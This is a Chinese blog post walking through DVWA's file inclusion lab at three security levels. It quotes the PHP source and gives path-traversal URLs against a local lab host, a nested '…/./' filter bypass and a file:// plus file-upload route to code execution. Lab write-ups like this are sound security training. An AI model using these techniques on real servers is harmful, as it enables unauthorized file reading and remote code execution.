File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)。
Low:
源码分析一下:
<?php
// The page we wish to display
//直接获取page参数,未做任何过滤
$file = $_GET[ 'page' ];
?>
page的参数值,就是点击的文件名;
修改URL:
http://192.168.124.13/dvwa/vulnerabilities/fi/?page=…/…/phpinfo.php
获取到上传的phpinfo内容;
Medium:
源码分析一下:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
//将参数中的http:// https:// ../ ..\都替换成空
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
过滤前:http://192.168.124.13/dvwa/vulnerabilities/fi/?page=…/…/phpinfo.php
过滤后:http://192.168.124.13/dvwa/vulnerabilities/fi/?page=phpinfo.php
构造新的:
http://192.168.124.13/dvwa/vulnerabilities/fi/?page=…/./…/./phpinfo.php
使得过滤后变回:
http://192.168.124.13/dvwa/vulnerabilities/fi/?page=…/…/phpinfo.php
High:
源码分析一下:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
//文件名必须以file开始并且只能为include.php
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
file协议 中文意思:本地文件传输协议
什么是File:File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。
如何使用File:要使用File协议,基本的格式如下:file://文件路径,比如要打开D盘xxx文件夹中的xxx文件,那么可以在资源管理器或浏览器地址栏中输入:file://d:/xxx/xxx回车。
file协议可以进行代码执行,如果配合文件上传,传到DVWA目录中,改为txt或者jpg文件类型,同样会将txt,jpg类型的文件当作php代码执行。
2444
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
